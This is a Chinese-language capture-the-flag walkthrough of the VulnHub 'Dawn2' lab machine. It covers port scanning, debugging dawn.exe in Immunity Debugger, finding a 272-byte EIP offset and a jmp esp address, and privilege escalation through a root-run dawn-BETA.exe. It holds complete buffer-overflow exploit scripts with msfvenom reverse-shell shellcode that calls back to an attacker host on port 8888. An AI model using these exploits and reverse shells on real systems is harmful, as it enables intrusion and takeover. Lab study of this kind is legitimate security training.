VulnHub靶场 | Dawn2

admin
admin
admin
138717
文章
114
评论
2025年1月11日13:35:28评论6 views字数 4161阅读13分52秒阅读模式

    "山前山后各有风景,有风无风都会自由"

项目地址:

https://download.vulnhub.com/sunset/dawn2.7z
难度:中等部署环境:virtualbox网络模式:桥接靶机IP:192.168.31.174

主机发现:

VulnHub靶场 | Dawn2

全端口扫描:

VulnHub靶场 | Dawn2

80端口信息收集:

VulnHub靶场 | Dawn2

发现一个zip压缩包文件,下载解压发现可执行文件

VulnHub靶场 | Dawn2

漏洞发现:

执行dawn.exe

VulnHub靶场 | Dawn2

查看此时端口的开放情况:

VulnHub靶场 | Dawn2

    1985端口被打开,在使用namp扫描靶机端口开放情况时也扫描到1985端口,所以该程序运行在靶机的1985端口上,windows上使用immunityDebugger动态调试工具测试该程序是否存在缓冲区溢出漏洞,使用immunityDebugger打开并运行dawn.exe

VulnHub靶场 | Dawn2

在kali上使用python建立socket连接发送payloadimport socket payload = 'A' * 500 + 'x00'try:    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('192.168.31.111', 1985))    s.send(payload.encode())    s.close()    print("payload send successfully")except Exception as e:    print(e)print("error")#可以发现EIP, ESP寄存器中都被字符A填充,存在缓冲区溢出漏洞

VulnHub靶场 | Dawn2

经测试,在覆盖EIP寄存器前需要填充272个字符,BBBB刚好覆盖EIP寄存器,CCCC...覆盖ESP寄存器

import socket payload = 'A' * 272 + 'BBBB' + 'CCCCCCCCCCCCCCCC' + 'x00'try:    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('192.168.31.111', 1985))    s.send(payload.encode())    s.close()except Exception as e:    print(e)print("error")

VulnHub靶场 | Dawn2

在调试工具中寻找 JMP ESP 指令的地址,然后将生成好的shellcode放置在EIP地址的后面,EIP寄存器中用 JMP ESP 指令的地址替换,因为ESP寄存器中存放将要执行的二进制代码,如果能够让CPU执行跳转到ESP的指令,那么就能够执行shellcode。

首先需要在immunityDebugger中添加mona.py

在GitHub上下载mano.py放到immunityDebugger安装目录下的PyCommands文件夹中

Mona项目地址:https://github.com/corelan/mona

使用mona查找 jmp esp 指令地址 !mona  jmp /j esp

0x345964ba

0x34581777

Msfvenom 生成反弹shellshellcode

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.31.96 LPORT=8888 -b "x00" -f c EXITFUNC=thread

python编写exp

#!/usr/bin/pythonimport socketbuff = ("xdaxc4xbdx36xccxf1x3exd9x74x24xf4x5ex2bxc9xb1""x52x31x6ex17x83xc6x04x03x58xdfx13xcbx58x37x51""x34xa0xc8x36xbcx45xf9x76xdax0exaax46xa8x42x47""x2cxfcx76xdcx40x29x79x55xeex0fxb4x66x43x73xd7""xe4x9exa0x37xd4x50xb5x36x11x8cx34x6axcaxdaxeb""x9ax7fx96x37x11x33x36x30xc6x84x39x11x59x9ex63""xb1x58x73x18xf8x42x90x25xb2xf9x62xd1x45x2bxbb""x1axe9x12x73xe9xf3x53xb4x12x86xadxc6xafx91x6a""xb4x6bx17x68x1exffx8fx54x9ex2cx49x1fxacx99x1d""x47xb1x1cxf1xfcxcdx95xf4xd2x47xedxd2xf6x0cxb5""x7bxafxe8x18x83xafx52xc4x21xa4x7fx11x58xe7x17""xd6x51x17xe8x70xe1x64xdaxdfx59xe2x56x97x47xf5""x99x82x30x69x64x2dx41xa0xa3x79x11xdax02x02xfa""x1axaaxd7xadx4ax04x88x0dx3axe4x78xe6x50xebxa7""x16x5bx21xc0xbdxa6xa2x2fxe9xb7x52xd8xe8xc7xb0""xa0x64x21xdexc0x20xfax77x78x69x70xe9x85xa7xfd""x29x0dx44x02xe7xe6x21x10x90x06x7cx4ax37x18xaa""xe2xdbx8bx31xf2x92xb7xedxa5xf3x06xe4x23xeex31""x5ex51xf3xa4x99xd1x28x15x27xd8xbdx21x03xcax7b""xa9x0fxbexd3xfcxd9x68x92x56xa8xc2x4cx04x62x82""x09x66xb5xd4x15xa3x43x38xa7x1ax12x47x08xcbx92""x30x74x6bx5cxebx3cx8bxbfx39x49x24x66xa8xf0x29""x99x07x36x54x1axadxc7xa3x02xc4xc2xe8x84x35xbf""x61x61x39x6cx81xa0")payload = "A" * 272 + "x77x17x58x34"  + "x90" * 32 + buff + "x00"try:    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('192.168.31.111', 1985))    s.send(payload)    s.close()    print("payload send successfully")except Exception as e:    print(e)    print("error")

kali监听8888端口,python2运行exp

VulnHub靶场 | Dawn2

漏洞利用:

修改exp,将连接IP改为靶机IP,重新生成shellcode

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.31.96 LPORT=8888 -f c -b 'x00' EXITFUNC=thread

修改exp:

#!/usr/bin/pythonimport socketbuff = ("xddxc0xd9x74x24xf4x58x2bxc9xbbxcax52x3bx9dxb1""x12x31x58x17x03x58x17x83x22xaexd9x68x83x94xe9""x70xb0x69x45x1dx34xe7x88x51x5ex3axcax01xc7x74""xf4xe8x77x3dx72x0ax1fx7ex2cxf3xbfx16x2fx0cx1d""x5fxa6xedxd1xf9xe9xbcx42xb5x09xb6x85x74x8dx9a""x2dxe9xa1x69xc5x9dx92xa2x77x37x64x5fx25x94xff""x41x79x11xcdx02")payload = "A" * 272 + "x77x17x58x34"  + "x90" * 32 + buff + "x00"try:    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('192.168.31.174', 1985))    s.send(payload)    s.close()    print("payload send successfully")except Exception as e:    print(e)print("error")

kali监听8888端口,python2运行exp

VulnHub靶场 | Dawn2

Flag1:

VulnHub靶场 | Dawn2

权限提升:

dawn-daemon主目录下存在dawn-BETA.exe文件,并且属主为root

VulnHub靶场 | Dawn2

查看进程,该程序可能正在以root身份运行

VulnHub靶场 | Dawn2

漏洞利用与上述步骤相同:

#!/usr/bin/pythonimport socketbuff = ("xddxc0xd9x74x24xf4x58x2bxc9xbbxcax52x3bx9dxb1""x12x31x58x17x03x58x17x83x22xaexd9x68x83x94xe9""x70xb0x69x45x1dx34xe7x88x51x5ex3axcax01xc7x74""xf4xe8x77x3dx72x0ax1fx7ex2cxf3xbfx16x2fx0cx1d""x5fxa6xedxd1xf9xe9xbcx42xb5x09xb6x85x74x8dx9a""x2dxe9xa1x69xc5x9dx92xa2x77x37x64x5fx25x94xff""x41x79x11xcdx02")payload = "A" * 13 + "x13x15x50x52"  + "x90" * 32 + buff + "x00"try:    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('192.168.31.174', 1435))    s.send(payload)    s.close()    print("payload send successfully")except Exception as e:    print(e)print("error")

VulnHub靶场 | Dawn2

Flag2:

VulnHub靶场 | Dawn2

原文始发于微信公众号(0x00实验室):VulnHub靶场 | Dawn2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月11日13:35:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub靶场 | Dawn2https://cn-sec.com/archives/1208967.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息